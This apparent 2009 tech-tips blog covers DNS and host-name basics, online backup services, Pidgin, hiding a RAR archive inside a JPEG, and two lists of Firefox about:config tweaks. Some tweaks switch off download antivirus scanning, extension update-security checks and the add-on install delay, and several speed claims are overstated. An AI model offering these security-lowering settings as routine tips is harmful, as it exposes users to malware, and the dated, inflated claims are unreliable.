A domain name is the name that is purchased from a registrar. It will be something like hcidata.com or hcidata.co.uk. Note that there is no www at the beginning of a domain name. A domain name can be subdivided into sub-domains - for example www.hcidata.com. Once you own a domain, there is no reasonable limit to the number (or names) of the sub-domains you can create. A sub-domain can be allocated to a host machine - for example a PC. In fact many sub-domains can be allocated to the same host machine. The way sub-domains are allocated to a host machine is to create a record in the DNS (Domain Name Servers) that records the sub-domain name and the IP address of the host machine. Any requests for a sub-domain (e.g. www.hcidata.com) are converted to an IP address by DNS and the IP address is used to route the request through the network until it reaches the host machine.

In the early years of the Internet, each sub-domain would have a unique IP address so it was common for a host machine to have only one sub domain name. Nowadays, the common practice is to have many sub-domains with the same IP address. It is also common for the domain name to be converted to the IP address of the host machine that runs the www sub domain.

A host name is the unique name of a machine. When the host operating system is set up it is given a name. This name may reflect the prime use of the machine. For example, a host machine that converts host names to IP addresses using DNS may be called dns.hcidata.com and a host machine that is a web server may be called www.hcidata.com. When we need to find the host name from an IP address we send a request to the host using its IP address. The host will respond with its host name.

IP address to Country:

IP addresses are allocated by regional organisations. Therefore it is relatively easy to work out the country in which an IP is likely to reside. When an IP is allocated to a company they are expected to be used in the country the organisation resides. But, there is nothing to stop a company allocating an IP to a machine in another country. For example. A company is allocated a range of IP addresses X.Y.Z.0 to X.Y.Z.255 for use in England. This company has a private network with a branch office in New York. So, it uses most of the IP address in England but uses some of them in the States. So, we cannot guarantee that the country is 100% correct when converting an IP address, but we would expect it to be correct at least 90% of the time.

You can find or change any host name to its ip address or vice versa here

UPLOAD WHAT EVER YOU WANT

2009-03-13T23:59:00.000+05:30

Upload what ever you want

Low hard disk space but high speed internet with unlimited transfer, then its not a problem.

The table below shows the top 25 online backup companies in the world. Our ranking is based on a number of factors.
Here are some of the major criteria that we strictly followed to come up with these top 25 companies:

* Security
* Software Features
* Software Ease of Use
* Speed
* Reliability
* Uptime
* Quality and Accessibility of Technical Support
* Cost per MB per month

The Top 25 Online Backup Companies for August 2007 are:

1. www.mediamax.com
2. www.mozy.com
3. www.box.net
4. www.carbonite.com
5. www.ibackup.com
6. www.novastor.com
7. www.datadepositbox.com
8. www.evault.com
9. www.intronis.com
10. www.file123.com
11. www.filesanywhere.com
12. www.remote-backup.com
13. www.backup-technology.co.uk
14. www.omnidrive.com
15. www.amerivault.com
16. www.livevault.com
17. www.BeInSync.com
18. www.backupsolutions.com
19. www.quantumrbs.ca
20. www.drivehq.com
21. www.dataprotection.com
22. www.titanize.com
23. www.vaultlogix.com
24. www.sosonlinebackup.com
25. www.bitleap.com

AMAZING SOLUTION FOR UNIVERSAL MESSENGER

2009-03-13T18:54:00.003+05:30

Pidgin is a multi-protocol Instant Messaging client that allows you to use all of your IM accounts at once.

Pidgin can work with:

AIM, Bonjour, Gadu-Gadu, Google Talk,Groupwise, ICQ, IRC, MSN, QQ, SILC, SIMPLE, Sametime, XMPP, Yahoo!, Zephyr.

So now you can able to have touch all the friends in different messenger in sametime without any problem.

Beside this you can also get access to plenty of free plug-ins, including ones that can store a history of your commutation, store notes about friends, and other handy functions.

Download links:

Download from here or from official Pidigin site

FOLDER OPTIONS MISSING

2009-03-12T23:21:00.000+05:30

Many of us sometimes find the folder options missing in windows explorer.

Enable it just by some simple steps.

Open Run and then type "gpedit.msc".

Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"

Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option.

HIDE YOUR FILES IN A JPEG

2009-03-12T22:58:00.002+05:30

Well, did you know you could hide your files in a JPEG file?For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok,Let's start

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both the files.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .You can also check the file size of output file.

COOLEST FIRFOX TRICKS

2009-03-10T18:28:00.003+05:30

You may have installed countless add-on in Firefox to enhance your using experience, but if you want to get the most out of Firefox, you really have to hack your way into the about: config

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance. Here are 28 of the popular tweaks.

Accessing your about:config page
In your Firefox, type about:config in the address bar.

You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed.

On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field. The list will narrow to only the entries that match your keyword as you type.

To modify the value, simply double click on the entry value field and update the entry. That’s all!

Now, let’s get to the tweaking.
1) Adjust the Smart Location Bar’s Number of Suggestions

In Firefox 3, when you start typing in the location bar, a drop-down list of suggestion URLs will be shown. If you want it to show more than 12 suggestions (12 is the default), you can adjust the browser.urlbar.maxRichResults keys and get it to show the number you want.

Config name: browser.urlbar.maxRichResults
Default: 12

Modified value: Set to your desired number of suggestion. If you want to disable it all together, set it to -1

2) Disable the session restore function
Firefox 3 automatically saves your session every 10 secs so that whenever it crashes, it can restore all your tabs. While this is a useful feature, some of you might find it irritating. To disable this function, toggle the value of browser.sessionstore.enabled to False
Config name: browser.sessionstore.enabled

Default: True
Modified value: False if you want to disable the session restore function

3) Adjust the Session Restore Saving Frequency

Same as above, if you decided to keep the session restore feature on, but want to reduce the session saving frequency, change the value of browser.sessionstore.interval so that Firefox will save the session at a longer interval.

Config name: browser.sessionstore.interval
Default: 10000 (in msecs, equivalent to 10secs)

Modified value: Set it to your desired value. 1000 means 1 sec and 60000 means 1 minute.

4) Enable Advanced Color Profile Support

Firefox has this advanced color profile features that display higher image quality. It is not enabled by default as it has a negative effect on the performance of the browser. If you are concern with the image quality rather than the performance, you can activated it via the gfx.color_management.enabled setting

Config name: gfx.color_management.enabled
Default: False

Modified value: True (if you want to activate the color profile support feature)

5) Disable Antivirus Scanning

This is mainly for Windows users. By default, Firefox 3 automatically scan the downloaded file with the default anti-virus application to make sure it is free of virus. If you download a big file, it could take a long time for the whole scanning process to complete. To increase the performance of the browser, you might want to consider disabling the anti-virus scanning via the browser.download.manager.scanWhenDone key.

Config name: browser.download.manager.scanWhenDone

Default: True

Modified value: False (if you want to disable it)

6) Configuring The Scrolling Tabs

When you opened many tabs, Firefox will not keep on reducing the tab width. Instead, it shows a scrolling bar so that the min width (100px) is conserved and you can scroll to find your tabs. If you are those who don’t like the scrolling tab function and prefer Firefox to show all the tabs, regardless how small it is, you can set the value ofbrowser.tabs.tabMinWidth to 0 to disable it. Similarly, if you want Firefox to display more tabs before showing the scrolling button, you can reduce the default value to a lower value, say 75 pixels.

Config name: browser.tabs.tabMinWidth
Default: 100

Modified value: 0 if you want to disable the scrolling functions, other values to set the min width value

7) Show/Disable Close button on Tabs

Some people love to see the Close (the red X) button on every tabs, but some hate it. Whatever is it, you can configure it to your preferences via thebrowser.tabs.closeButtons setting.

Config name: browser.tabs.closeButtons
Default: 1

Modified values:
0 - display a close button on the active tab only
1- display close buttons on all tabs
2- don’t display any close buttons
3- display a single close button at the end of the tab strip

8)Extend Scripts Execution Time

In Firefox 3, a script is only given 10 seconds to respond, after which it will issue a unresponsive script warning. If you are hooked on a slow network connection, you might want to increase the script execution time via dom.max_script_run_time to cut down on the frequency of the no script warning.

Config name: dom.max_script_run_time

Default:10 (in secs)

Modified value: 20, or any values greater than 10

9) Handling JavaScript Popups

When you come across a site that executes a javascript open new window function, and if the popup window is without all the usual window features, i.e. back/forward/reload buttons, status bar etc, Firefox will automatically treat it as a popup and will not open it as a new tab. However, if you find this to be a nuisance and wanted to open all new windows in a new tabs, you can specify it via thebrowser.link.open_newwindow.restriction setting.

Config name: browser.link.open_newwindow.restriction

Default: 2 - Open all JavaScript windows the same way as you have Firefox handle new windows unless the JavaScript call specifies how to display the window
Modified values:
0 – open all links as how you have Firefox handle new windows
1 – do not open any new windows
2- open all links as how you have Firefox handle new windows unless the Javascript specify how to display the window

10) Enable Spell Checking In All Text Fields

The default spell checking function only checks for multi-line text boxes. You can get it to spell-check for single line text box as well.

Config name: layout.spellcheckDefault

Default: 1 (spell checker for multi-lines text boxes only)

Modified values:
0 – disable the spell checker
2 – enable the spell checker for all text boxes

11) Open Search Box Results In New Tab

When you search using the search box at the top right hand corner of the browser, it will display the search results in the current tab. If you don’t want the search to interfere with your current tab, you can tweak the browser.search.openintab to make it open in a new tab.

Config Name: browser.search.openintab
Default: False

Modified value: True (open search box results in new tab)

12) Lower The Physical Memory Used When Minimized

This tweak is mainly for Windows users. When you minimize Firefox, it will send Firefox to your virtual memory and free up your physical memory for other programs to use. Firefox will reduce its physical memory usage, when minimized, to approximately 10MB (give or take some) and when you maximize Firefox it will take back the memory that it needs.

The preference name does not exist and needs to be created.

Right click on the background and select New->Boolean.

Enter the name when prompted: config.trim_on_minimize

Enter the values: True

13) Speed up your Firefox

Several tweaks required for this

Config name: network.http.pipelining

Default: False

Modified value: True

Config name: network.http.proxy.pipelining

Default: False

Modified value: True

Config name: network.http.pipelining.maxrequests
Default: 4

Modified value: any value higher than 4, but not more than 8

Config name: network.http.max-connections

Default: 30

Modified value: 96

Config name: network.http.max-connections-per-server

Default: 15

Modified value: 32

14) Increase/Decrease the Amount of Disk Cache

When a page is loaded, Firefox will cache it into the hard disk so that it doesn’t need to be download again for redisplaying. The bigger the storage size you cater for Firefox, the more pages it can cache.

Before you increase the disk cache size, make sure that browser.cache.disk.enabledbrowser.cache.disk.enable is set to True.

Config name: browser.cache.disk.capacity

Default: 50000 (in KB)

Modified value:
0 – disable disk caching
any value lower than 50000 reduces the disk cache
any value higher than 50000 increases the disk cache.

15) Select all text when click on the URL bar

In Windows and Mac, Firefox highlights all text when you click on the URL bar. In Linux, it does not select all the text. Instead, it places the cursor at the insertion point. Regardless which platform you are using, you can now tweak it to either select all or place cursor at insertion point.

Config name: browser.urlbar.clickSelectsAll

Modified value:
False – place cursor at insertion point
True – select all text on click

16) Autofill Address in URL Bar

Other than the smart location feature, you can also get your URL bar to autofill the address as you type the URL.

Config name: browser.urlbar.autofill

Default: False

Modified value: True (Have Firefox autofill the address as you type in the URL bar)

17) Same Zoom Level For Every Site

Firefox remembers your zoom preference for each site and set it to your preferences whenever you load the page. If you want the zoom level to be consistent from site to site, you can toggle the value of browser.zoom.siteSpecific from True to False.

Config name: browser.zoom.siteSpecific

Default: True

Modified value: False (enable same zoom preferences for every sites)

18) Setting your zoom limit

If you find that the max/min zoom level is still not sufficient for your viewing, you can change the zoom limit to suit your viewing habits.

Config name: zoom.maxPercent

Default: 300 (percent)

Modified value: any value higher than 300

Config name: zoom.minPercent

Default: 30 (percent)
value: any value

19) Configure Your Backspace Button

In Firefox, you can set your backspace to better use by getting it to either go back to theprevious page or act as page up function.

Config name: browser.backspace_action

Default: 2 (does nothing)

Modified value:
0 – go back previous page
1- page up

20) Increase Offline Cache

If you do not have access to Internet most of the time, you might want to increase the offline cache so that you can continue to work offline. By default, Firefox 3 caches 500MB of data from supported offline Web apps. You can change that value to whatever amount of your choice.

Config name: browser.cache.offline.capacity

Default: 512000 (in KB)

Modified value: any value higher than 512000 will increase the cache value

21) Auto Export Firefox 3 bookmarks to bookmarks.html

Unlike the previous version, Firefox 3 backup the bookmarks file in places.sqlite rather than the usual bookmarks.html. Since bookmarks.html allows us to export and sync our bookmarks with other browser, it will be very useful if Firefox 3 can backup the bookmark to the bookmarks.html as well.

Config name: browser.bookmarks.autoExportHTML

Default: False

Modified value: True (auto export bookmarks file to bookmarks.html)

22) Disable Extension Compatibility Checks

This is useful if you want to use an extension that is not supported by your version of Firefox badly. It is not recommended, but you can still do it at your own risk.

Right click and select New->Boolean. Enter extensions.checkCompatibility in the field. Enter False in the next field.

Right click again and select New->Boolean. Enter extensions.checkUpdateSecurity into the field and enter False into the next field.

23) Disable Delay Time When Installing Add-on

Everytime you wanted to install a Firefox add-on, you will have to wait for several secs before the actual installation starts. If you are tired of waiting, you can turn the functionsecurity.dialog_enable_delay off so that the installation will start immediately upon clicking.

Config name: security.dialog_enable_delay

Default: 2000 (in msec)

Modified value:
0 – start installation immediately
any other value (in msec)

24) View Source in Your Favorite Editor

This is very useful for developers who are always using the ‘view source‘ function. This tweak allows you to view the source code in an external editor.

There are two configuration need to be made:

Config name: view_source.editor.external

Default: False

Modified value: True ( enable view source using external text editor)

Config name: view_source.editor.path

Default: blank

Modified value: insert the file path to your editor here.

25) Increasing ‘Save Link As‘ timeout value

When you right click and select the ‘Save Link As…‘, the browser will request the content disposition header from the URL so as to determine the filename. If the URL did not deliver the header within 1 sec, Firefox will issue a timeout value. This could happen very frequently in a slow network connection environment. To prevent this issue from happening frequently, you can increase the timeout value so as to reduce the possibility of a timeout.

Config name: Browser.download.saveLinkAsFilenameTimeout

Default: 1000 (1 sec)

Modified value: any value higher than 1000 (value is in msec)

26) Animate Fullscreen Toolbar Collapse mode

In Firefox’s fullscreen mode, toolbars and the tab strip are hidden at the top of the screen and only shown on mouseover. To draw attention to this, there is an animation of the toolbar sliding upwards and off-screen when fullscreen mode is toggled on. For performance issue, the animation of the collapse of the toolbar only appear for the first time. For some reason that you may love/hate the animation, you can adjustBrowser.fullscreen.animateUp to switch it on/off for every collapse.

Config name: Browser.fullscreen.animateUp

Default: 1 (animate the toolbar collapse only the first time)

Modified value:
0 -disable the animation
2- enable the animation for every collapse

27) Autohide Toolbar in Fullscreen mode

In fullscreen mode, the toolbar is set to autohide and appear upon mouseover. If you have a need to view the toolbar at all time, you can toggle the value ofbrowser.fullscreen.autohide to False to always show the toolbar.

Config name: browser.fullscreen.autohide

Default: True (always autohide)

Modified value: False (always show the toolbar)

28) Increase Add-On search result

If you go to Tools->Add-ons->Get Add-ons and perform a search there, Firefox will only fetch and display 5 matching results. If you want Firefox to show more than 5 results (say 10), you can adjust extensions.getAddons.maxResults to get it to display more results.

Config name: extensions.getAddons.maxResults

Default: 5

Modified value: any value more than 5
This list of about:config is definitely not the complete list. If you have any tricks not listed here, please add it in the comment.

FIREFOX TWEAKS

2009-03-06T23:37:00.001+05:30

Easy Firefox Tweaks for Super Fast Web Browsing

Fast loading web pages while surfing the Internet may have more to do with your web browser settings and preferences than your Internet connection speed.

Try these easy Firefox tweaks and you’ll see that you’re surfing the Internet from 3 to 30 times faster!

To get started, open your Firefox web browser. In the address/location bar type [about:config] and then press your Enter key. (NOTE: DON’T TYPE THE BRACKETS.)

Open Firefox Web Browser

Tweak #1:
In the Filter bar type [network.http.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Firefox Web Browser Tricks

Tweak #2:
In the Filter bar type [network.http.pipelining.maxrequests]. Then, double-click on this line under Preference Name and change the value from 4 to a higher number anywhere from 10 to 30. I set mine to 30.

Firefox Web Browser Tricks

Tweak #3:
In the Filter bar type [network.http.proxy.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Firefox Web Browser Tweaks

Tweak #4:
In the Filter bar type [network.dns.disableIPv6]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Firefox Web Browser Tricks

Tweak #5:
In the Filter bar type [plugin.expose_full_path]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Firefox Web Browser Tweaks

Tweak #6:
In the Filter bar type [network.protocol-handler.external.ms-help]. Now, you are going to create a new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer.

Firefox Web Browser Tweaks

In the New Integer value box type in [nglayout.initialpaint.delay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.

Firefox Tricks

Tweak #7:
In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [content.notify.backoffcount] and click OK. Then in the Enter Integer value box type [5] and click OK.

Firefox Tricks

Tweak #8:
In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [ui.submenuDelay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.

Firefox Tweaks

Now, close your web browser and restart it. You’ll see how much faster web pages are loading.